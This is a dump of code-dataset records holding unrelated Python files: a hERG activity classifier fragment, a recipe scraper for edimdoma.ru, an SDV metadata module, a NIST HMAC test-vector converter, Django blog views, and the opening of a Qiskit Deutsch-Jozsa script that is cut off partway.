actnames_train.append(activities[i][1])\n\n # Standardize structures\n s = Standardizer()\n standard_mols_train = []\n for mol in mols_train:\n standard_mols_train.append(s.standardize(mol))\n\n return_dict = {}\n\n return_dict['molnames'] = molnames_train\n return_dict['molecules'] = standard_mols_train\n return_dict['model'] = loaded_model\n return_dict['inds'] = indexes\n return_dict['ad_fps'] = appdom_fps\n return_dict['ad_radius'] = appdom_radius\n if 'activities' in locals():\n return_dict['activities'] = acts_train\n\n return return_dict\n\n\ndef check_appdom(*args):\n if len(args) < 4 or len(args) > 5:\n print(\"Error: incorrect number of arguments passed to check_appdom()\")\n exit(1)\n\n appdom_fps = args[0]\n appdom_radius = args[1]\n pred_mols = args[2]\n pred_names = args[3]\n if len(args) == 5:\n pred_acts = args[4]\n\n accept_mols = []\n accept_names = []\n reject_mols = []\n reject_names = []\n\n if 'pred_acts' in locals():\n accept_acts = []\n reject_acts = []\n\n for i in range(len(pred_mols)):\n test_fp = FingerprintMols.FingerprintMol(pred_mols[i])\n distances = []\n for training_fp in appdom_fps:\n distances.append(1.0 - (DataStructs.FingerprintSimilarity(training_fp,test_fp)))\n\n distances=np.array(distances)\n if np.min(distances) <= appdom_radius:\n accept_mols.append(pred_mols[i])\n accept_names.append(pred_names[i])\n if 'pred_acts' in locals():\n accept_acts.append(pred_acts[i])\n else:\n reject_mols.append(pred_mols[i])\n reject_names.append(pred_names[i])\n if 'pred_acts' in locals():\n reject_acts.append(pred_acts[i])\n\n print(\"Compound %s is out of the AD for this model\",pred_names[i])\n\n if len(reject_names) == 0:\n print(\"No molecules rejected for prediction by AD\")\n\n return_dict = {}\n\n return_dict['test_mols'] = accept_mols\n return_dict['test_names'] = accept_names\n return_dict['rej_mols'] = reject_mols\n return_dict['rej_names'] = reject_names\n\n if 'pred_acts' in locals():\n return_dict['test_acts'] = accept_acts\n return_dict['rej_acts'] = reject_acts\n\n return(return_dict)\n\n\ndef calc_descs(mols_train, indexes):\n # Calculate descriptors\n raw_descriptors = np.zeros((len(mols_train), len(dlist)))\n for i in range(len(mols_train)):\n for j in range(len(dlist)):\n raw_descriptors[i, j] = dlist[j](mols_train[i])\n\n # Select descriptors\n del_indexes = []\n for i in range(len(dlist)):\n if i not in indexes:\n del_indexes.append(i)\n\n del_indexes.reverse()\n\n for i in del_indexes:\n raw_descriptors = np.delete(raw_descriptors, [i], axis=1)\n\n return (raw_descriptors)\n\n\ndef make_preds(*args):\n\n if len(args) < 3 and len(args) > 4:\n print(\"Error: incorrect number of arguments passed to check_appdom()\")\n\n mol_names = args[0]\n descs = args[1]\n saved_model = args[2]\n if len(args) == 4:\n y_true = args[3]\n\n # Make predictions for test data using previous model\n y_pred = saved_model.predict(descs)\n\n return_dict = {}\n\n return_dict['predictions'] = y_pred\n\n if 'y_true' in locals():\n print(\"Molecule\\tActual Act.\\tPredicted Act.\")\n for out_line in range(len(mol_names)):\n print(mol_names[out_line], \"\\t\", y_true[out_line], \"\\t\\t\", y_pred[out_line])\n print(\"\")\n print(\"Accuracy Score:\",accuracy_score(y_true,y_pred))\n print(\"\")\n confmat = confusion_matrix(y_true,y_pred, labels=[1,0])\n print(confmat)\n return_dict['accuracy'] = accuracy_score(y_true, y_pred)\n else:\n print(\"Molecule\\tPredicted Act.\")\n for out_line in range(len(mol_names)):\n print(mol_names[out_line], \"\\t\", y_pred[out_line])\n\n return return_dict\n\n\nif __name__ == '__main__':\n model_data = read_mols(\"AmyCompounds\", 42, 301)\n molnames = model_data['molnames']\n molecules = model_data['molecules']\n model = model_data['model']\n inds = model_data['inds']\n ad_fps = model_data['ad_fps']\n ad_radius = model_data['ad_radius']\n if len(model_data.keys()) == 7:\n activities = model_data['activities']\n\n if 'activities' in locals():\n appdom_results = check_appdom(ad_fps, ad_radius, molecules, molnames, activities)\n else:\n appdom_results = check_appdom(ad_fps, ad_radius, molecules, molnames)\n test_mols = appdom_results['test_mols']\n test_names = appdom_results['test_names']\n rej_mols = appdom_results['rej_mols']\n rej_names = appdom_results['rej_names']\n if len(appdom_results.keys()) == 6:\n test_acts = appdom_results['test_acts']\n rej_acts = appdom_results['rej_acts']\n\n descriptors = calc_descs(test_mols, inds)\n\n if 'activities' in locals():\n make_preds(test_names, descriptors, model, test_acts)\n else:\n make_preds(test_names, descriptors, model)\n\n","sub_path":"hERG/classifier/runmodel.py","file_name":"runmodel.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"330855095","text":"import collections\nimport json\nimport os\nimport re\nfrom pathlib import Path\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_site_access(url):\n \"\"\"Проверяет корректность ссылки возвращает объект класса BeautifulSoup.\"\"\"\n try:\n response = requests.get(url)\n response.raise_for_status()\n src = response.text\n return BeautifulSoup(src, 'lxml')\n except Exception as ex:\n exit(f\"{ex}\\nCan't get data from server. URL: {url}\")\n\n\ndef get_recipes_links(eda_url):\n \"\"\"Возвращает ссылки на блюда.\"\"\"\n soup = get_site_access(eda_url)\n\n dishes = soup.find_all('div', class_='card__description')\n recipes_links = {}\n amount = 0 # Количество рецептов\n for dish in dishes:\n dish_title = dish.find('div', class_='card__title title').text\n dish_link = dish.find('a').get('href')\n recipes_links[dish_title] = f'https://www.edimdoma.ru{dish_link}'\n amount += 1\n if amount == 21:\n break\n return recipes_links\n\n\ndef get_recipe(title, link, meal):\n \"\"\"Собирает информацию о блюде\"\"\"\n soup = get_site_access(link)\n\n # На сколько порций рассчитано\n portions = soup.find(class_='field__container').find(attrs={'name': 'servings'})['value']\n\n dish = collections.defaultdict(list)\n dish['Название блюда'] = title\n dish['Количество порций'] = portions\n fractions = ('½', '⅓', '¼', '⅕', '⅛')\n\n products = soup.find('div', {\"id\": \"recipe_ingredients_block\"}).find_all(class_='definition-list-table')\n # Перебираем продукты из списка ингредиентов\n for product in products:\n product_title = product.find(class_='recipe_ingredient_title').text\n dish['Ингредиенты'].append(product_title)\n\n product_count = product.find(class_='definition-list-table__td definition-list-table__td_value').text\n # Проверяем наличие цифр в product_count\n if re.search(r'\\d+', product_count) or any(fraction for fraction in fractions if fraction in product_count):\n items = product_count.split()\n digit = [item for item in items if item.replace(',', '').isdigit() or item in fractions]\n measure = [item for item in items if item not in digit]\n dish['Количество'].append(''.join(digit))\n dish['Мера'].append(''.join(measure))\n else:\n dish['Количество'].append(None)\n dish['Мера'].append(product_count)\n product_price = 0 # Здесь вызов функция с ценой\n\n cooking_steps = soup.find_all(class_='plain-text recipe_step_text')\n # Записываем шаги готовки в словарь файл\n for number, step in enumerate(cooking_steps, 1):\n dish['Шаги готовки'].append(f'{number}. {step.text}')\n\n return dish\n\n\ndef get_recipes_by_category(meal, page_number):\n \"\"\"Собирает данные по всем рецептам из данной категории и записывает их в JSON файл\"\"\"\n dishes = []\n edimdoma_url = f'https://www.edimdoma.ru/retsepty?page={page_number}&tags%5Brecipe_mealtime%5D%5B%5D={meal}'\n recipes_links = get_recipes_links(edimdoma_url)\n for dish_title, dish_link in recipes_links.items():\n dish = get_recipe(dish_title, dish_link, meal)\n dishes.append(dish)\n with open(f'recipes/{page_number}/{meal}.json', 'w', encoding='utf-8') as file:\n json.dump(dishes, file, indent=4, ensure_ascii=False)\n print(f'Обработка категории {meal} завершена.')\n return f'Обработка категории {meal} завершена.'\n\n\ndef main():\n if 'recipes' not in os.listdir('.'):\n Path('recipes').mkdir(parents=True, exist_ok=True)\n\n meals = ['завтрак', 'обед', 'ужин', 'полдник']\n # Скачиваем 5 различных списков блюд по каждому приему пищи\n for page in range(1, 6):\n Path(f'recipes/{page}').mkdir(parents=True, exist_ok=True)\n for meal in meals:\n get_recipes_by_category(meal, page)\n print('Списки рецептов успешно сформированы')\n else:\n print('Списки рецептов уже существуют')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"18212352","text":"import copy\nimport json\nimport logging\nimport os\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\nfrom rdt import HyperTransformer, transformers\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef _read_csv_dtypes(table_meta):\n \"\"\"Get the dtypes specification that needs to be passed to read_csv.\"\"\"\n dtypes = dict()\n for name, field in table_meta['fields'].items():\n field_type = field['type']\n if field_type == 'categorical':\n dtypes[name] = str\n elif field_type == 'id' and field.get('subtype', 'integer') == 'string':\n dtypes[name] = str\n\n return dtypes\n\n\ndef _parse_dtypes(data, table_meta):\n \"\"\"Convert the data columns to the right dtype after loading the CSV.\"\"\"\n for name, field in table_meta['fields'].items():\n field_type = field['type']\n if field_type == 'datetime':\n data[name] = pd.to_datetime(data[name], format=field['format'], exact=False)\n elif field_type == 'numerical' and field.get('subtype') == 'integer':\n data[name] = data[name].dropna().astype(int)\n elif field_type == 'id' and field.get('subtype', 'integer') == 'integer':\n data[name] = data[name].dropna().astype(int)\n\n return data\n\n\ndef _load_csv(root_path, table_meta):\n \"\"\"Load a CSV with the right dtypes and then parse the columns.\"\"\"\n relative_path = os.path.join(root_path, table_meta['path'])\n dtypes = _read_csv_dtypes(table_meta)\n\n data = pd.read_csv(relative_path, dtype=dtypes)\n data = _parse_dtypes(data, table_meta)\n\n return data\n\n\nclass Metadata:\n \"\"\"Dataset Metadata.\n\n The Metadata class provides a unified layer of abstraction over the dataset\n metadata, which includes both the necessary details to load the data from\n the hdd and to know how to parse and transform it to numerical data.\n\n Args:\n metadata (str or dict):\n Path to a ``json`` file that contains the metadata or a ``dict`` representation\n of ``metadata`` following the same structure.\n\n root_path (str):\n The path where the ``metadata.json`` is located. Defaults to ``None``.\n \"\"\"\n\n def _get_relationships(self):\n \"\"\"Exttract information about child-parent relationships.\n\n Creates the following attributes:\n * ``_child_map``: set of child tables that each table has.\n * ``_parent_map``: set ot parents that each table has.\n \"\"\"\n self._child_map = defaultdict(set)\n self._parent_map = defaultdict(set)\n\n for table_meta in self._metadata['tables'].values():\n if table_meta.get('use', True):\n table = table_meta['name']\n for field_meta in table_meta['fields'].values():\n ref = field_meta.get('ref')\n if ref:\n parent = ref['table']\n self._child_map[parent].add(table)\n self._parent_map[table].add(parent)\n\n @staticmethod\n def _dict_metadata(metadata):\n \"\"\"Get a metadata ``dict`` with SDV format.\n\n For each table create a dict of fields from a previous list of fields.\n\n Args:\n metadata (dict):\n Original metadata to format.\n\n Returns:\n dict:\n Formated metadata dict.\n \"\"\"\n new_metadata = copy.deepcopy(metadata)\n tables = new_metadata['tables']\n new_tables = dict()\n\n for table in tables:\n new_tables[table['name']] = table\n\n fields = table['fields']\n new_fields = dict()\n for field in fields:\n new_fields[field['name']] = field\n\n table['fields'] = new_fields\n\n new_metadata['tables'] = new_tables\n\n return new_metadata\n\n def __init__(self, metadata, root_path=None):\n if isinstance(metadata, str):\n self.root_path = root_path or os.path.dirname(metadata)\n with open(metadata) as metadata_file:\n metadata = json.load(metadata_file)\n else:\n self.root_path = root_path or '.'\n\n self._metadata = self._dict_metadata(metadata)\n self._hyper_transformers = dict()\n self._get_relationships()\n\n def get_children(self, table_name):\n \"\"\"Get table children.\n\n Args:\n table_name (str):\n Name of the table from which to get the children.\n\n Returns:\n set:\n Set of children for the given table.\n \"\"\"\n return self._child_map[table_name]\n\n def get_parents(self, table_name):\n \"\"\"Get table parents.\n\n Args:\n table_name (str):\n Name of the table from which to get the parents.\n\n Returns:\n set:\n Set of parents for the given table.\n \"\"\"\n return self._parent_map[table_name]\n\n def get_table_meta(self, table_name):\n \"\"\"Get the metadata dict for a table.\n\n Args:\n table_name (str):\n Name of table to get data for.\n\n Returns:\n dict:\n table metadata\n \"\"\"\n return self._metadata['tables'][table_name]\n\n def load_table(self, table_name):\n \"\"\"Load table data.\n\n Args:\n table_name (str):\n Name of the table that we want to load.\n\n Returns:\n pandas.DataFrame:\n DataFrame with the contents of the table.\n \"\"\"\n LOGGER.info('Loading table %s', table_name)\n table_meta = self.get_table_meta(table_name)\n return _load_csv(self.root_path, table_meta)\n\n def _get_dtypes(self, table_name, ids=False):\n \"\"\"Get a ``dict`` with the ``dtypes`` for each field of a given table.\n\n Args:\n table_name (str):\n Table name for which to retrive the ``dtypes``.\n ids (bool):\n Whether or not include the id fields. Defaults to ``False``.\n\n Returns:\n dict:\n Dictionary that contains the field names and data types from a table.\n\n Raises:\n ValueError:\n If a field has an invalid type or subtype.\n \"\"\"\n dtypes = dict()\n table_meta = self.get_table_meta(table_name)\n for name, field in table_meta['fields'].items():\n field_type = field['type']\n if field_type == 'categorical':\n dtypes[name] = np.object\n\n elif field_type == 'boolean':\n dtypes[name] = bool\n\n elif field_type == 'numerical':\n field_subtype = field.get('subtype', 'float')\n if field_subtype == 'integer':\n dtypes[name] = int\n elif field_subtype == 'float':\n dtypes[name] = float\n else:\n raise ValueError('Invalid {} subtype {} - {}'.format(\n field_type, field_subtype, name))\n\n elif field_type == 'datetime':\n dtypes[name] = np.datetime64\n\n elif field_type == 'id':\n if ids:\n if (name != table_meta.get('primary_key')) and not field.get('ref'):\n raise ValueError(\n 'id field `{}` is neither a primary or a foreign key'.format(name))\n\n field_subtype = field.get('subtype', 'integer')\n if field_subtype == 'integer':\n dtypes[name] = int\n elif field_subtype == 'string':\n dtypes[name] = str\n else:\n raise ValueError('Invalid {} subtype: {} - {}'.format(\n field_type, field_subtype, name))\n\n else:\n raise ValueError('Invalid field type: {} - '.format(field_type, name))\n\n return dtypes\n\n def _get_pii_fields(self, table_name):\n \"\"\"Get the ``pii_category`` for each field that contains PII.\n\n Args:\n table_name (str):\n Table name for which to get the pii fields.\n\n Returns:\n dict:\n pii field names and categories.\n \"\"\"\n pii_fields = dict()\n for name, field in self.get_table_meta(table_name)['fields'].items():\n if field['type'] == 'categorical' and field.get('pii', False):\n pii_fields[name] = field['pii_category']\n\n return pii_fields\n\n @staticmethod\n def _get_transformers(dtypes, pii_fields):\n \"\"\"Create the transformer instances needed to process the given dtypes.\n\n Temporary drop-in replacement of ``HyperTransformer._analyze`` method,\n before RDT catches up.\n\n Args:\n dtypes (dict):\n mapping of field names and dtypes.\n pii_fields (dict):\n mapping of pii field names and categories.\n\n Returns:\n dict:\n mapping of field names and transformer instances.\n \"\"\"\n transformers_dict = dict()\n for name, dtype in dtypes.items():\n dtype = np.dtype(dtype)\n if dtype.kind == 'i':\n transformer = transformers.NumericalTransformer(dtype=int)\n elif dtype.kind == 'f':\n transformer = transformers.NumericalTransformer(dtype=float)\n elif dtype.kind == 'O':\n anonymize = pii_fields.get(name)\n transformer = transformers.CategoricalTransformer(anonymize=anonymize)\n elif dtype.kind == 'b':\n transformer = transformers.BooleanTransformer()\n elif dtype.kind == 'M':\n transformer = transformers.DatetimeTransformer()\n else:\n raise ValueError('Unsupported dtype: {}'.format(dtype))\n\n LOGGER.info('Loading transformer %s for field %s',\n transformer.__class__.__name__, name)\n transformers_dict[name] = transformer\n\n return transformers_dict\n\n def _load_hyper_transformer(self, table_name):\n \"\"\"Create and return a new ``rdt.HyperTransformer`` instance for a table.\n\n First get the ``dtypes`` and ``pii fields`` from a given table, then use\n those to build a transformer dictionary to be used by the ``HyperTransformer``.\n\n Args:\n table_name (str):\n Table name for which to load the HyperTransformer.\n\n Returns:\n rdt.HyperTransformer:\n Instance of ``rdt.HyperTransformer`` for the given table.\n \"\"\"\n dtypes = self._get_dtypes(table_name)\n pii_fields = self._get_pii_fields(table_name)\n transformers_dict = self._get_transformers(dtypes, pii_fields)\n return HyperTransformer(transformers=transformers_dict)\n\n def transform(self, table_name, data):\n \"\"\"Transform data for a given table.\n\n If the ``HyperTransformer`` for a table is ``None`` it is created.\n\n Args:\n table_name (str):\n Name of the table that is being transformer.\n data (pandas.DataFrame):\n Table data.\n\n Returns:\n pandas.DataFrame:\n Transformed data.\n \"\"\"\n hyper_transformer = self._hyper_transformers.get(table_name)\n if hyper_transformer is None:\n hyper_transformer = self._load_hyper_transformer(table_name)\n fields = list(hyper_transformer.transformers.keys())\n hyper_transformer.fit(data[fields])\n self._hyper_transformers[table_name] = hyper_transformer\n\n hyper_transformer = self._hyper_transformers.get(table_name)\n fields = list(hyper_transformer.transformers.keys())\n return hyper_transformer.transform(data[fields])\n\n def get_table_names(self):\n \"\"\"Get the list of table names.\n\n Returns:\n list:\n table names.\n \"\"\"\n return list(self._metadata['tables'].keys())\n\n def get_tables(self, tables=None):\n \"\"\"Get a dictionary with data from multiple tables.\n\n If a ``tables`` list is given, only load the indicated tables.\n Otherwise, load all the tables from this metadata.\n\n Args:\n tables (list):\n List of table names. Defaults to ``None``.\n\n Returns:\n dict(str, pandasd.DataFrame):\n mapping of table names and their data loaded as ``pandas.DataFrame`` instances.\n \"\"\"\n return {\n table_name: self.load_table(table_name)\n for table_name in tables or self.get_table_names()\n }\n\n def get_fields(self, table_name):\n \"\"\"Get table fields metadata.\n\n Args:\n table_name (str):\n Name of the table to get the fields from.\n\n Returns:\n dict:\n Mapping of field names and their metadata dicts.\n \"\"\"\n return self.get_table_meta(table_name)['fields']\n\n def get_primary_key(self, table_name):\n \"\"\"Get the primary key name of the indicated table.\n\n Args:\n table_name (str):\n Name of table for which to get the primary key field.\n\n Returns:\n str or None:\n Primary key field name. ``None`` if the table has no primary key.\n \"\"\"\n return self.get_table_meta(table_name).get('primary_key')\n\n def get_foreign_key(self, parent, child):\n \"\"\"Get table foreign key field name.\n\n Args:\n parent (str):\n Name of the parent table.\n child (str):\n Name of the child table.\n\n Returns:\n str or None:\n Foreign key field name.\n\n Raises:\n ValueError:\n If the relationship does not exist.\n \"\"\"\n primary = self.get_primary_key(parent)\n\n for field in self.get_fields(child).values():\n ref = field.get('ref')\n if ref and ref['field'] == primary:\n return field['name']\n\n raise ValueError('{} is not parent of {}'.format(parent, child))\n\n def reverse_transform(self, table_name, data):\n \"\"\"Reverse the transformed data for a given table.\n\n Args:\n table_name (str):\n Name of the table to reverse transform.\n data (pandas.DataFrame):\n Data to be reversed.\n\n Returns:\n pandas.DataFrame\n \"\"\"\n hyper_transformer = self._hyper_transformers[table_name]\n reversed_data = hyper_transformer.reverse_transform(data)\n\n for name, dtype in self._get_dtypes(table_name, ids=True).items():\n reversed_data[name] = reversed_data[name].dropna().astype(dtype)\n\n return reversed_data\n","sub_path":"sdv/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":14873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"503453764","text":"# MIT License\n\n# Copyright (c) 2018 brycx\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\n\n\n\n\"\"\"\nThis script converts the NIST HMAC.rsp test vector file into a format\nthat will be used to test orion. Some input paramters are changed,\nand only the test vectors for HMAC-SHA256, HMAC-SHA384 and HMAC-SHA512 are\nkept. Any test vectors that have truncated output are also removed.\n\nThis means orion tests against the test vectors for an HMAC with the\nexact matching output size.\n\"\"\"\n\nkeyword_replacements = {\n 'Msg' : 'Input',\n 'Mac' : 'Output',\n}\n\nlines = []\n\nwith open('src/tests/test_data/HMAC.rsp') as infile:\n\n # Stores the most recent [Len=] parameter from original .rsp\n variant = 0\n\n for line in infile:\n for src, target in keyword_replacements.items():\n line = line.replace(src, target)\n\n # Check if output is accepted SHA variant and length\n Output_is_valid = False\n\n # Set HMAC with SHA variant tag according to [Len=] param\n if line.startswith(\"[L=32]\"):\n variant = 256\n if line.startswith(\"[L=48]\"):\n variant = 384\n if line.startswith(\"[L=64]\"):\n variant = 512\n\n if line.startswith(\"Output\") and len(line) == 74 and variant == 256:\n Output_is_valid = True\n if line.startswith(\"Output\") and len(line) == 106 and variant == 384:\n Output_is_valid = True\n if line.startswith(\"Output\") and len(line) == 138 and variant == 512:\n Output_is_valid = True\n\n # If two consecutive newlines appear, remove one\n if line == \"\\n\" and lines[-1] == \"\\n\":\n lines.pop()\n\n if not line.startswith(\"Output\") or Output_is_valid is True:\n if not line.startswith(\"[\"):\n if not line.startswith(\"Count\"):\n if not line.startswith(\"Klen\"):\n if not line.startswith(\"Tlen\"):\n lines.append(line)\n if line.startswith(\"Output\"):\n # Without newline chars, 73, 105, 137\n if variant == 256:\n lines.insert(-3, \"HMAC = SHA256\\n\")\n if variant == 384:\n lines.insert(-3, \"HMAC = SHA384\\n\")\n if variant == 512:\n lines.insert(-3, \"HMAC = SHA512\\n\")\n else:\n # If the output is truncated, then we remove the last three inserted lines\n for x in range(1,3):\n lines.pop()\n\nwith open('src/tests/test_data/HMAC_fmt.rsp', 'w') as outfile:\n for line in lines:\n outfile.write(line)\n\n# Empty list\nlines[:] = []\n","sub_path":"src/tests/test_generation/make_nist_hmac.py","file_name":"make_nist_hmac.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"119754403","text":"from django.shortcuts import render\r\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\r\nfrom post.models import Post \r\nfrom .models import Signup\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.utils.safestring import mark_safe\r\nimport json\r\nfrom django.shortcuts import redirect\r\nfrom django.db.models import Count, Q\r\n\r\n\r\n\r\ndef search(request):\r\n queryset = Post.objects.all()\r\n query = request.GET.get('q') # getting the q=....\r\n if query: \r\n queryset = queryset.filter(\r\n Q(title__icontains=query) |\r\n Q(overview__icontains=query)\r\n ).distinct()\r\n context = {\r\n 'queryset' : queryset\r\n }\r\n return render(request, 'auth/search_result.html', context) \r\n\r\n\r\n\r\ndef get_category_count():\r\n queryset = Post.objects.values('categories__title').annotate(Count('categories__title'))\r\n return queryset\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n# Create your views here.\r\ndef home_feed(request):\r\n if not request.user.is_authenticated:\r\n return render(request, 'auth/logout.html', {})\r\n\r\n featured = Post.objects.filter(featured=True)\r\n latest = Post.objects.order_by('-timestamp')[0:3]\r\n \r\n if request.method == \"POST\":\r\n email = request.POST[\"email\"]\r\n new_signup = Signup()\r\n new_signup.email = email \r\n new_signup.save() # comment to save\r\n \r\n \r\n context = {\r\n 'object_list': featured,\r\n 'latest': latest\r\n }\r\n return render(request, 'auth/home_feed.html', context)\r\n\r\n\r\ndef blog(request):\r\n category_count = get_category_count()\r\n most_recent = Post.objects.order_by('-timestamp')[:3]\r\n post_list = Post.objects.all() \r\n paginator = Paginator(post_list, 4)\r\n page_request_var = 'page'\r\n page = request.GET.get(page_request_var)\r\n try:\r\n paginated_queryset = paginator.page(page)\r\n except PageNotAnInteger:\r\n paginated_queryset = paginator.page(1)\r\n except EmptyPage:\r\n paginated_queryset = paginator.page(paginator.num_pages)\r\n\r\n context = {\r\n 'queryset': paginated_queryset,\r\n 'most_recent': most_recent,\r\n 'page_request_var': page_request_var,\r\n 'category_count' : category_count\r\n\r\n } \r\n return render(request, 'auth/blog.html', context)\r\n\r\ndef post(request):\r\n return render(request, 'auth/post.html', {})\r\n\r\n@login_required\r\ndef chatroom(request, room_name):\r\n return render(request, 'auth/chatroom.html', {\r\n 'room_name_json' : mark_safe(json.dumps(room_name)),\r\n 'username' : mark_safe(json.dumps(request.user.username)),\r\n })\r\n","sub_path":"auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"602697291","text":"from qiskit import(\r\n QuantumCircuit,\r\n execute,\r\n Aer,\r\n IBMQ,\r\n transpile,\r\n assemble)\r\nfrom qiskit.visualization import plot_histogram\r\nfrom qiskit.providers.ibmq import least_busy\r\nfrom qiskit.quantum_info.operators import Operator\r\n# Import measurement calibration functions\r\nfrom qiskit.ignis.mitigation.measurement import (complete_meas_cal, tensored_meas_cal,\r\n CompleteMeasFitter, TensoredMeasFitter)\r\n\r\nfrom inspect import signature\r\nimport sys\r\nimport numpy as np\r\nimport itertools\r\nimport time\r\nimport datetime\r\nimport matplotlib.pyplot as plt\r\nimport func\r\nfrom func import *\r\n\r\n# MY_API_KEY = '' <-- ENTER KEY\r\n# IBMQ.save_account(MY_API_KEY)\r\nprovider = IBMQ.load_account()\r\nsmall_devices = provider.backends(filters=lambda x: x.configuration().n_qubits == 5\r\n and not x.configuration().simulator)\r\nbackend = least_busy(small_devices)\r\n#backend = provider.get_backend('ibmq_london')\r\n\r\nsimulator = Aer.get_backend('qasm_simulator')\r\n\r\n# U_f | x > | b > = | x > | b + f(x) >\r\n# preserve the state of the first n qubits\r\n# if f(x) == 0, we preserve the state of the helper qubit b\r\n# otherwise, if f(x) == 1, we invert the state of the helper qubit\r\n# U_f is just a 2^n by 2^n matrix where the \"diagonal\" consists of 2 by 2 blocks that are either the identity or Pauli X\r\n# the i-th diagonal block corresponds to the i-th possible n-bit input x_i to f\r\n## it is I if f(x_i) == 0\r\n## it is X if f(x_i) == 1\r\n# i.e., it is X^f(x_i)\r\ndef get_U_f(f, n):\r\n\tU_f = np.zeros((2 ** (n + 1), 2 ** (n + 1)))\r\n\tfor idx, inputs in enumerate(list(itertools.product([0, 1], repeat=n))):\r\n\t\toutput = f(inputs)\r\n\t\t\r\n\t\t# the 2x2 box on the diagonal is I\r\n\t\tif output == 0:\r\n\t\t\tU_f[2 * idx, 2 * idx] = 1\r\n\t\t\tU_f[2 * idx + 1, 2 * idx + 1] = 1\r\n\t\t\r\n\t\t# the 2x2 box on th diagonal is Pauli X\r\n\t\telif output == 1:\r\n\t\t\tU_f[2 * idx, 2 * idx + 1] = 1\r\n\t\t\tU_f[2 * idx + 1, 2 * idx] = 1\r\n\r\n\treturn U_f\r\n\r\n# generates the quantum circuit for Deutsch-Jozsa given U_f and n (the length of input bit strings)\r\ndef dj_program(U_f, n):\r\n\tcircuit = QuantumCircuit(n + 1, n)\r\n\r\n\t# invert the helper qubit to make it 1\r\n\tcircuit.x(n)\r\n\t\r\n\t# apply Hadamard to all input qubits and helper qubit\r\n\tfor i in range(n + 1):\r\n\t\tcircuit.h(i)\r\n\r\n\t# define the U_f gate based on the unitary matrix returned by get_U_f\r\n\tU_f_gate = Operator(U_f)\r\n\tcircuit.unitary(U_f_gate, range(n, -1, -1), label='U_f')\r\n\t\r\n\t# apply Hadamard to all input qubits\r\n\tfor i in range(n):\r\n\t\tcircuit.h(i)\r\n\r\n\treturn circuit\r\n\r\n# pretty print results\r\ndef print_results(test_name, circuit_size, results, meas_filter, transpile_time, trials, n, b):\r\n\r\n\tprint()\r\n\tprint()\r\n\tprint('===================================')\r\n\tprint()\r\n\tprint('Test:', test_name)\r\n\tprint('Transpile time:', transpile_time, 'sec')\r\n\tprint('Number of gates in transpiled circuit:', circuit_size)\r\n\tprint('Run time:', sum([result.time_taken for result in results]) / trials, 'sec')\r\n\tprint()\r\n\tprint('===================================')\r\n\tprint('===================================')\r\n\tprint()\r\n\r\n\t# Compute counts and error-mitigated counts\r\n\tcounts = {}\r\n\tmitigated_counts = {}\r\n\tfor result in results:\r\n\t\tc = result.get_counts()\r\n\t\tmitigated_results = meas_filter.apply(result)\r\n\t\tmc = mitigated_results.get_counts(0)\r\n\r\n\t\tcounts = {key: counts.get(key, 0) + c.get(key, 0) for key in set(counts) | set(c)}\r\n\t\tmitigated_counts = {key: mitigated_counts.get(key, 0) + mc.get(key, 0) for key in set(mitigated_counts) | set(mc)}\r\n\t\t\r\n\tcounts_sorted = sorted(counts.items(), key=lambda item: item[1], reverse=True)\r\n\tfor idx, (key, value) in enumerate(counts_sorted):\r\n\t\t\tverdict = 'Constant!'\r\n\t\t\tprint('===================================')\r\n\t\t\tprint()\r\n\t\t\tprint('Result', idx + 1)\r\n\t\t\tprint('Frequency:', counts[key])\r\n\t\t\tprint('Mitigated frequency:', mitigated_counts[key])\r\n\r\n\r\n # Constant function if measure all 0's, balanced otherwise\r\n\t\t\tfor i in range(n):\r\n\t\t\t if key[i] != '0': \r\n\t\t\t verdict = 'Balanced!'\r\n\t\t\t break\r\n\r\n\t\t\tprint('Measurement:', key)\r\n\t\t\tprint('Function is:', verdict)\r\n\t\t\tprint()\r\n\t\t\tprint()\r\n\t\t\tprint('===================================')\r\n\t\t\tprint()\r\n\t\t\tprint()\r\n\r\n\tplot_histogram([counts, mitigated_counts], title=test_name, legend=['raw', 'mitigated'])\r\n\tplt.axhline(1/(2 ** n), color='k', linestyle='dashed', linewidth=1)\r\n\tplt.savefig('deutsch_jozsa_hist_%s_%d_{:%Y-%m-%d_%H-%M-%S}.png'.format(datetime.datetime.now()) % (test_name, trials), bbox_inches = \"tight\")\t\r\n\r\nif __name__ == '__main__':\r\n\r\n\t# Process options and arguments\r\n\tif 